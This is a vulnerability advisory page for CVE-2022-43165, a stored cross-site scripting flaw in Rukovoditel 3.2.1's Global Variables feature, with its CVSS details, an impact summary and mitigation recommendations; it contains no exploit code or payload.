Skip to main content

CVE-2022-43165: n/a in n/a

Medium
VulnerabilityCVE-2022-43165cvecve-2022-43165
Published: Fri Oct 28 2022 (10/28/2022, 00:00:00 UTC)
Source: CVE
Vendor/Project: n/a
Product: n/a

Description

A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create".

AI-Powered Analysis

AILast updated: 07/05/2025, 03:41:29 UTC

Technical Analysis

CVE-2022-43165 is a stored cross-site scripting (XSS) vulnerability identified in the Global Variables feature of Rukovoditel version 3.2.1. Rukovoditel is a web-based project management and database application platform. The vulnerability exists in the /index.php?module=global_vars/vars endpoint, specifically in the handling of the 'Value' parameter when creating new global variables. Authenticated users can inject malicious scripts or HTML payloads into this parameter. When other users view the affected page or variable, the injected script executes in their browsers, potentially leading to session hijacking, credential theft, or other malicious actions. The vulnerability requires the attacker to have authenticated access and user interaction (clicking 'Create') to inject the payload. The CVSS 3.1 base score is 5.4 (medium severity), reflecting network attack vector, low attack complexity, privileges required, user interaction needed, and partial confidentiality and integrity impact but no availability impact. The vulnerability is categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation). No known exploits in the wild or patches have been reported as of the publication date. The scope is changed (S:C), indicating the vulnerability affects resources beyond the initially vulnerable component, potentially impacting other users or components within the application.

Potential Impact

For European organizations using Rukovoditel 3.2.1, this vulnerability poses a moderate risk. Since exploitation requires authenticated access, the threat is primarily from insiders or attackers who have compromised user credentials. Successful exploitation could allow attackers to execute arbitrary scripts in the context of other users, leading to theft of session tokens, unauthorized actions, or spreading malware within the application environment. This could compromise the confidentiality and integrity of project management data, which may include sensitive business information or personal data protected under GDPR. The vulnerability could also facilitate further attacks by enabling privilege escalation or lateral movement within the organization's network. Given the collaborative nature of Rukovoditel, the impact could extend to multiple users and departments, potentially disrupting workflows and damaging organizational reputation.

Mitigation Recommendations

To mitigate this vulnerability, organizations should first verify if they are running Rukovoditel version 3.2.1 and restrict access to the Global Variables feature to trusted users only. Implement strict input validation and output encoding on the 'Value' parameter to neutralize any injected scripts. Since no official patch is currently available, consider applying temporary workarounds such as disabling the Global Variables feature or restricting the ability to create or modify global variables to highly privileged users. Monitor logs for suspicious activity related to the global_vars module and review user permissions regularly. Additionally, educate users about the risks of XSS and enforce strong authentication mechanisms to reduce the risk of credential compromise. Organizations should track vendor communications for any forthcoming patches and apply them promptly once released.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2022-10-17T00:00:00.000Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d9818c4522896dcbd7ec4

Added to database: 5/21/2025, 9:08:40 AM

Last enriched: 7/5/2025, 3:41:29 AM

Last updated: 7/31/2025, 2:04:34 AM

Views: 11

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats